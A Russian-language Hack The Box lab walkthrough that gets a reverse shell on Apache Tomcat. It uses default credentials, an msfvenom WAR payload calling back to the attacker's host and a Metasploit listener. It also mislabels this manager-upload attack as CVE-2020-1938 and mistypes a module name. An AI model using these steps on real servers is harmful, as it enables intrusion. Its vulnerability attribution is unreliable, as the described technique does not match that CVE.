Пошаговое руководство по эксплуатации CVE-2020-1938 (произвольная загрузка JSP для выполнения кода (RCE) в Apache Tomcat) с использованием msfvenom и Metasploit в лабораторной среде Hack The Box.
CVE-2020-1938 — это критическая уязвимость, которая затрагивает Apache Tomcat с 9.0.0.M1 по 9.0.0.30, с 8.5.0 по 8.5.50 и с 7.0.0 по 7.0.99 ⚠️ Эта уязвимость была использована в лаборатории Hack The Box.
🔗 Ссылка: Запись NIST NVD
Веб-сайт использует учётные данные по умолчанию для функции Server Status.
Этот интерфейс показывает, что версия — Apache Tomcat/7.0.88, 64-битная архитектура.
Из этого интерфейса мы переходим к списку приложений, который открывает функцию Загрузка .war файлов.
При успешной загрузке .war файл выполняется по пути /directory/filename
Исследование версии Apache Tomcat подтвердило уязвимость к CVE-2020-1938
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.3 LPORT=3004 -f war -o exploit.war
Используя msfvenom, генератор полезных нагрузок Metasploit, мы создаём нашу полезную нагрузку exploit.war.
После генерации файла зайдите внутрь и найдите имя .jsp файла, например gcvxdtmxvw.jsp, и сохраните его на потом.
msfconsole
use exploit/multi/hanlder
Set LHOST 10.10.14.3
Set LPORT 3004
Используя msfconsole, мы настраиваем слушатель, который ожидает выполнения нашей полезной нагрузки.


Мы загружаем наш файл в разделе deploy, после чего обновляем экран и видим, что файл успешно загружен. Для завершения эксплуатации необходимо перейти по пути ip/hacked/gcvxdtmxvw.jsp.

Это заставляет запрос зависнуть, однако мы можем видеть локально на нашей машине, что у нас есть обратное соединение.